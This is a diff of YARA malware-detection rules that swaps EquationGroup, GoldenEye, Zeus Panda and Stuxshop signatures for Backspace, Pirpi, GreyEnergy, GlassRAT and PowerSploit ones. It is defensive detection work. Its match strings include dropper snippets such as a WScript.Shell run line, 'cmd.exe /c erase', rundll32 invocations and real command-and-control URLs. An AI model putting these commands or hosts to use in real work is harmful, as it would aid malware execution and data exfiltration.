+		$s6 = "Mozilla/5.0 (Windows NT 5.2; rv:12.0) Gecko/20100101 Firefox/12.0" fullword ascii
+		$s7 = "%s\\%s_%03d" fullword wide
+		$s8 = "\\PI_001.dat" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 3 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_EVFR_Ridearea2_12 : FILE
+rule SIGNATURE_BASE_Apt_Backspace : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "63c7733c-9942-56f3-95cc-f3e72b693739"
-		date = "2017-04-15"
+		description = "Detects APT backspace"
+		author = "Bit Byte Bitten"
+		id = "3da3337d-b6d3-5661-b43e-535e06817303"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3481-L3498"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_backspace.yar#L6-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0119cd825c02a094ddd76c5cb27bee6cef112f25333eab62017448804b29286e"
+		hash = "6cbfeb7526de65eb2e3c848acac05da1e885636d17c1c45c62ad37e44cd84f99"
+		logic_hash = "6fa86ada5c965bd9c199c2a1cf9b691499a3d423da7db50c8987b6725c0c0f29"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
-		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
-		hash4 = "e702223ab42c54fff96f198611d0b2e8a1ceba40586d466ba9aadfa2fd34386e"
 
 	strings:
-		$x2 = "** CreatePayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
+		$s1 = "!! Use Splice Socket !!"
+		$s2 = "User-Agent: SJZJ (compatible; MSIE 6.0; Win32)"
+		$s3 = "g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_13 : FILE
+rule SIGNATURE_BASE_Pirpi_1609_A : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Pirpi Backdoor - and other malware (generic rule)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8bc3c47c-7357-5692-86aa-e43b40f8c1ab"
-		date = "2017-04-15"
+		id = "72b996e2-56cf-5a8d-8d8b-97eda7105d26"
+		date = "2016-09-08"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3500-L3516"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_pirpi.yar#L10-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0a1859266b859d4da660a7fc7d0015954ff100c39b941b5461ba0c99b5103547"
+		logic_hash = "470745d0dd44c161ed6ec474f85531a3aca8ebb0adb98b902cb0b7465ca07d8b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
-		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash1 = "2a5a0bc350e774bd784fc25090518626b65a3ce10c7401f44a1616ea2ae32f4c"
+		hash2 = "8caa179ec20b6e3938d17132980e0b9fe8ef753a70052f7e857b339427eb0f78"
 
 	strings:
-		$x1 = "Skip call to PackageRideArea().  Payload has already been packaged. Options -x and -q ignored." fullword ascii
-		$s2 = "ERROR: pGvars->pIntRideAreaImplantPayload is NULL" fullword ascii
+		$x1 = "expand.exe1.gif" fullword ascii
+		$c1 = "expand.exe" fullword ascii
+		$c2 = "ctf.exe" fullword ascii
+		$s1 = "flvUpdate.exe" fullword wide
+		$s2 = "www.ThinkWorking.com" fullword wide
+		$s3 = "ctfnon.exe" fullword ascii
+		$s4 = "flv%d.exe" fullword ascii
+		$s5 = "HARDWARE\\DESCRIPTION\\System\\BIOS" fullword ascii
+		$s6 = "12811[%d].gif" fullword ascii
+		$s7 = "GetApp03" fullword wide
+		$s8 = "flvUpdate" fullword wide
+		$s9 = "%d-%4.4d%d" fullword ascii
+		$s10 = "http://%s/%5.5d.html" fullword ascii
+		$s11 = "flvbho.exe" fullword wide
+		$op1 = { 74 08 c1 cb 0d 03 da 40 eb }
+		$op2 = { 03 f5 56 8b 76 20 03 f5 33 c9 49 }
+		$op3 = { 03 dd 66 8b 0c 4b 8b 5e 1c 03 dd 8b 04 8b 03 c5 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( $x1 or all of ( $c* ) or all of ( $op* ) ) ) or ( 8 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Nameprobe_SMBTOUCH_14 : FILE
+rule SIGNATURE_BASE_Pirpi_1609_B : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Pirpi Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b3b7037b-d08e-5b32-93ec-870f8ce088ac"
-		date = "2017-04-15"
+		id = "caf63b97-efd7-5cd4-8954-b86db4d93cf5"
+		date = "2016-09-08"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3518-L3535"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_pirpi.yar#L45-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c60fc34aa42810a5622fbe53122ded4ffb4ee321fed1badd481ce5c2ae5225ef"
+		logic_hash = "4dafff80fb7bfcffccf96d991245c13b3208fd4f5a21488d7d6885758ef05078"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "fbe3a4501654438f502a93f51b298ff3abf4e4cad34ce4ec0fad5cb5c2071597"
-		hash2 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309"
+		hash1 = "498b98c02e19f4b03dc6a3a8b6ff8761ef2c0fedda846ced4b6f1c87b52468e7"
 
 	strings:
-		$s1 = "DEC Pathworks TCPIP service on Windows NT" fullword ascii
-		$s2 = "<\\\\__MSBROWSE__> G" fullword ascii
-		$s3 = "<IRISNAMESERVER>" fullword ascii
+		$s1 = "tconn <ip> <port> //set temp connect value, and disconnect." fullword ascii
+		$s2 = "E* ListenCheckSsl SslRecv fd(%d) Error ret:%d %d" fullword ascii
+		$s3 = "%s %s L* ListenCheckSsl fd(%d) SslV(-%d-)" fullword ascii
+		$s4 = "S:%d.%d-%d.%d V(%d.%d) Listen On %d Ok." fullword ascii
+		$s5 = "E* ListenCheckSsl fd(%d) SslAccept Err %d" fullword ascii
+		$s6 = "%s-%s N110 Ssl Connect Ok(%s:%d)." fullword ascii
+		$s7 = "%s-%s N110 Basic Connect Ok(%s:%d)." fullword ascii
+		$s8 = "tconn <ip> <port>" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_EVFR_RPC2_15 : FILE
+
+rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects samples from Grey Energy report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f671a10d-f0b8-5343-97b5-e60b7f2f0acf"
-		date = "2017-04-15"
+		id = "fc997540-075e-5f1c-9238-135c1572553b"
+		date = "2018-10-17"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3537-L3555"
+		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greyenergy.yar#L12-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6c61d17e1a985deb31bd6e1d603283e77df477b52fce9eb8b6cb4e99b2f9c4dc"
+		logic_hash = "0cbdc156b7080608c1071feeb4826a70bb259c55139d74d019465c4bb5244260"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
-		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
-		hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
+		hash1 = "6c52a5850a57bea43a0a52ff0e2d2179653b97ae5406e884aee63e1cf340f58b"
 
 	strings:
-		$x1 = "** SendAndReceive ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
-		$s8 = "Binding to RPC Interface %s over named pipe" fullword ascii
+		$x1 = "%SystemRoot%\\System32\\thinmon.dll" fullword ascii
+		$s2 = "'Cannot delete list entry (fatal error)!9The module %s cannot be executed on this system (0x%.4x).%Enumerate all sessions on TSE" wide
+		$s8 = "cbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbe" ascii
+		$s14 = "configure the service" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and pe.imphash ( ) == "98d1ad672d0db4b4abdcda73cc9835cb" and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_EVFR_16 : FILE
+rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_2 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects samples from Grey Energy report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2749227b-13e2-5669-a557-567ebd170a2f"
-		date = "2017-04-15"
+		id = "50830741-ba3d-505c-bb21-8cedc2162f96"
+		date = "2018-10-17"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3557-L3578"
+		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greyenergy.yar#L31-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3e6c4e013727bbbf3859374af46553067a9fc782f2eca582ea13d8eab03380ce"
+		logic_hash = "600bc5b423ef3281bfc7ad7ab479aa1208b0144b0f4afd8c2d14f17b5e2c600b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
-		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+		hash1 = "c6a54912f77a39c8f909a66a940350dcd8474c7a1d0e215a878349f1b038c58a"
 
 	strings:
-		$x1 = "ERROR: TbMalloc() failed for encoded exploit payload" fullword ascii
-		$x2 = "** EncodeExploitPayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
-		$x4 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
-		$s6 = "Sending Implant Payload (%d-bytes)" fullword ascii
-		$s7 = "ERROR: Encoder failed on exploit payload" fullword ascii
-		$s11 = "ERROR: VulnerableOS() != RET_SUCCESS" fullword ascii
+		$s1 = "WioGLtonuaptWmrnttfepgetneemVsnygnV" fullword ascii
+		$s2 = "PnSenariopoeKerGEtxrcy" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ETBL_ETRE_SMBTOUCH_17 : FILE
+rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_3 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects samples from Grey Energy report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "88bf610d-1c6e-554a-af82-46b5eb3cc6a5"
-		date = "2017-04-15"
+		id = "cc365dbf-1448-5219-95f5-d1154000f52d"
+		date = "2018-10-17"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3580-L3597"
+		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greyenergy.yar#L46-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ef86350732b5064035ff58b63202be29e906d2b566af105f03298e3e339eda52"
+		logic_hash = "f4851f5381a4d8dea488d50ff11048052826c51428f8610bc5d3480ed254d32f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
-		hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
-		hash3 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309"
+		hash1 = "0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0"
 
 	strings:
-		$x1 = "ERROR: Connection terminated by Target (TCP Ack/Fin)" fullword ascii
-		$s2 = "Target did not respond within specified amount of time" fullword ascii
+		$x1 = "USQTUNPPQONOPOQUMSNUTRMRRLVPUOPMROPMPMQTPNPONVUOUQOMMNNSRSRQQVTPPRSSNVSTURTMMOPTONSQTOMONQVMQNUSONTQTUTSRRPVTONUQNORQMRRNRUSPS" fullword ascii
+		$x2 = "tEMPiuP" fullword ascii
+		$x3 = "sryCEMieye" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Scanner_Output : FILE
+
+rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_4 : FILE
 {
 	meta:
-		description = "Detects output generated by EQGRP scanner.exe"
+		description = "Detects samples from Grey Energy report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a73bc98f-f7b1-5f16-bf23-1d5c9a7a371b"
-		date = "2017-04-17"
+		id = "1a2df257-a639-5868-a005-690d64cfbf2b"
+		date = "2018-10-17"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3609-L3626"
+		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greyenergy.yar#L62-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a8ac7e7f14d72798a1f6658eae4c66d871a525c8cb49afa2ca8656047da20524"
+		logic_hash = "c845be8b56dc9aa9f0eaec2a67c4baef9c9b4fd1789e96cd781e3876721b1297"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6974b8acf6a8f7684673b01753c3a8248a1c491900cccf771db744ca0442f96a"
+		hash2 = "165a7853ef51e96ce3f88bb33f928925b24ca5336e49845fc5fc556812092740"
+		hash3 = "4470e40f63443aa27187a36bbb0c2f4def42b589b61433630df842b6e365ae3d"
+		hash4 = "c21cf6018c2ee0a90b9d2c401aae8071c90b5a4bc9848a94d678d77209464f79"
 
 	strings:
-		$s0 = "# scanning ip  " ascii
-		$s1 = "# Scan for windows boxes" ascii fullword
-		$s2 = "Going into send" ascii fullword
-		$s3 = "# Does not work" ascii fullword
-		$s4 = "You are the weakest link, goodbye" ascii fullword
-		$s5 = "rpc   Scan for RPC  folks" ascii fullword
+		$x1 = "iiodttd.eWt" fullword ascii
+		$x2 = "irnnaar-ite-ornaa-naa-asoeienaeaanlagoeas:acnuihaaa" fullword ascii
+		$x3 = "NURVNTURVORSMSPPRTQMPTTQOQRP" fullword ascii
 
 	condition:
-		filesize < 1000KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "279adfbd42308a07b3131ee57d067b3e" or 1 of them )
 }
-rule SIGNATURE_BASE_Goldeneye_Ransomware_XLS : FILE
+rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_5 : FILE
 {
 	meta:
-		description = "GoldenEye XLS with Macro - file Schneider-Bewerbung.xls"
+		description = "Detects samples from Grey Energy report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6eafcc35-56ef-534f-884a-0bb47c27c274"
-		date = "2016-12-06"
+		id = "a8c4517d-912d-5264-b9ab-acdf37fc4d56"
+		date = "2018-10-17"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/jp2SkT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_goldeneye.yar#L10-L24"
+		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greyenergy.yar#L84-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "827c1d1c0f9c3ebd77413de7e1db5e29d05f2ece6676c79a79f6c1ff2788f42b"
+		logic_hash = "3ced67c514d54324b41a4a4a92c1d3138e75380f3129b39ae92c1895c267acb2"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2320d4232ee80cc90bacd768ba52374a21d0773c39895b88cdcaa7782e16c441"
+		hash1 = "037723bdb9100d19bf15c5c21b649db5f3f61e421e76abe9db86105f1e75847b"
+		hash2 = "b602ce32b7647705d68aedbaaf4485f1a68253f8f8132bd5d5f77284a6c2d8bb"
 
 	strings:
-		$x1 = "fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')" fullword ascii
-		$x2 = "var shell = new ActiveXObject('WScript.Shell');shell.run(t'" fullword ascii
+		$s12 = "WespySSld.eQ" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 4000KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
 }
-rule SIGNATURE_BASE_Goldeneyeransomware_Dropper_Malformedzoomit : FILE
+rule SIGNATURE_BASE_Glassrat
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6ebf2d13-7d58-5a1b-a836-66d533f408e8"
-		date = "2016-12-06"
+		description = "Detects GlassRAT by RSA (modified by Florian Roth - speed improvements)"
+		author = "RSA RESEARCH"
+		id = "7739d1f6-f16d-5599-9388-a1d89dbeb355"
+		date = "2015-11-03"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/jp2SkT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_goldeneye.yar#L26-L40"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_glassRAT.yar#L8-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c18405a272c9210973e3184b8267306919cba8795b12d5982a9e3e8f748f9782"
+		logic_hash = "939d2cb11ff414641f68b2913fe8d24458e1fd7ba450b8781072bb10da3ad039"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"
+		tags = ""
+		Info = "GlassRat"
 
 	strings:
-		$s1 = "ZoomIt - Sysinternals: www.sysinternals.com" fullword ascii
-		$n1 = "Mark Russinovich" wide
+		$bin1 = {85 C0 B3 01}
+		$bin3 = {68 4C 50 00 10}
+		$bin4 = {68 48 50 00 10}
+		$bin5 = {68 44 50 00 10}
+		$hs = {CB FF 5D C9 AD 3F 5B A1 54 13 FE FB 05 C6 22}
+		$s1 = "pwlfnn10,gzg"
+		$s2 = "AddNum"
+		$s3 = "ServiceMain"
+		$s4 = "The Window"
+		$s5 = "off.dat"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and $s1 and not $n1 )
+		all of ( $bin* ) and $hs and 3 of ( $s* )
 }
-rule SIGNATURE_BASE_Zeus_Panda : FILE
+rule SIGNATURE_BASE_Glassrat_Generic : FILE
 {
 	meta:
-		description = "Detects ZEUS Panda Malware"
+		description = "Detects GlassRAT Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2786b1e0-37af-5595-a24b-56ef3cb928a7"
-		date = "2017-08-04"
+		id = "d09c4a9f-15ad-56d7-b015-94f494420e98"
+		date = "2015-11-23"
 		modified = "2023-12-05"
-		reference = "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_zeus_panda.yar#L11-L33"
+		reference = "https://blogs.rsa.com/peering-into-glassrat/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_glassRAT.yar#L45-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "63312763196259204dcee6b6c46ae1a16abeab0afabbce9e2e8413131856b04e"
-		score = 75
+		logic_hash = "fdd309c403e53bfa80340c1334f90fd5ef5f4618737b19069a07f7aa63aeb23d"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bd956b2e81731874995b9b92e20f75dbf67ac5f12f9daa194525e1b673c7f83c"
+		hash1 = "30d26aebcee21e4811ff3a44a7198a5c519843a24f334880384a7158e07ae399"
+		hash2 = "3bdeb3805e9230361fb93c6ffb0bfec8d3aee9455d95b2428c7f6292d387d3a4"
+		hash3 = "79993f1912958078c4d98503e00dc526eb1d0ca4d020d17b010efa6c515ca92e"
+		hash4 = "a9b30b928ebf9cda5136ee37053fa045f3a53d0706dcb2343c91013193de761e"
+		hash5 = "c11faf7290299bb13925e46d040ed59ab3ca8938eab1f171aa452603602155cb"
+		hash6 = "d95fa58a81ab2d90a8cbe05165c00f9c8ad5b4f49e98df2ad391f5586893490d"
+		hash7 = "f1209eb95ce1319af61f371c7f27bf6846eb90f8fd19e8d84110ebaf4744b6ea"
 
 	strings:
-		$x1 = "SER32.dll" fullword ascii
-		$x2 = "/c start \"\" \"%s\"" fullword wide
-		$x3 = "del /F \"%s\"" fullword ascii
-		$s1 = "bcdfghklmnpqrstvwxz" fullword ascii
-		$s2 = "=> -,0;" fullword ascii
-		$s3 = "Yahoo! Slurp" fullword ascii
-		$s4 = "ZTNHGET ^&" fullword ascii
-		$s5 = "MSIE 9" fullword ascii
-		$s6 = "%s%08x.%s" fullword wide
+		$s1 = "cmd.exe /c %s" fullword ascii
+		$s2 = "update.dll" fullword ascii
+		$s3 = "SYSTEM\\CurrentControlSet\\Services\\RasAuto\\Parameters" fullword ascii
+		$s4 = "%%temp%%\\%u" fullword ascii
+		$s5 = "\\off.dat" ascii
+		$s6 = "rundll32 \"%s\",AddNum" fullword ascii
+		$s7 = "cmd.exe /c erase /F \"%s\"" fullword ascii
+		$s8 = "SYSTEM\\ControlSet00%d\\Services\\RasAuto" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 2 of ( $x* ) or 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 15MB and 5 of them
 }
-rule SIGNATURE_BASE_STUXSHOP_Config
+rule SIGNATURE_BASE_HKTL_Powersploit
 {
 	meta:
-		description = "Stuxshop standalone sample configuration"
-		author = "JAG-S (turla@chronicle.security)"
-		id = "67367db5-51b3-5177-960a-5b06161154e2"
-		date = "2023-12-05"
+		description = "Detects default strings used by PowerSploit to establish persistence"
+		author = "Markus Neis"
+		id = "8cb0753c-c5bb-56fc-b492-4e785f4bdaf4"
+		date = "2018-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxshop.yar#L2-L30"
+		reference = "https://www.hybrid-analysis.com/sample/16937e76db6d88ed0420ee87317424af2d4e19117fe12d1364fee35aa2fadb75?environmentId=100"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powersploit_dropper.yar#L1-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c1961e54d60e34bbec397c9120564e8d08f2f243ae349d2fb20f736510716579"
-		logic_hash = "9dd57f8b4e25a53dcf54dc75a1bb26675c7dd04dbb4d96286bcc0a6527a21782"
+		logic_hash = "00bc389147926f3b474a7072381bb8b9cddad3ff581a5d2182006a674e0c0163"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = ""
+		hash1 = "16937e76db6d88ed0420ee87317424af2d4e19117fe12d1364fee35aa2fadb75"
 
 	strings:
-		$cnc1 = "http://211.24.237.226/index.php?data=" ascii wide
-		$cnc2 = "http://todaysfutbol.com/index.php?data=" ascii wide
-		$cnc3 = "http://78.111.169.146/index.php?data=" ascii wide
-		$cnc4 = "http://mypremierfutbol.com/index.php?data=" ascii wide
-		$regkey1 = "Software\\Microsoft\\Windows\\CurrentVersion\\MS-DOS Emulation" ascii wide
-		$regkey2 = "NTVDMParams" ascii wide
-		$flowerOverlap1 = { 85 C0 75 3B 57 FF 75 1C FF 75 18 FF 75 14 50 FF 75 10 FF 75 FC FF 15 }
-		$flowerOverlap2 = { 85 C0 75 4C 8B 45 1C 89 45 0C 8D 45 0C 50 8D 45 08 FF 75 18 50 6A 00 FF 75 10 FF 75 20 FF 15 }
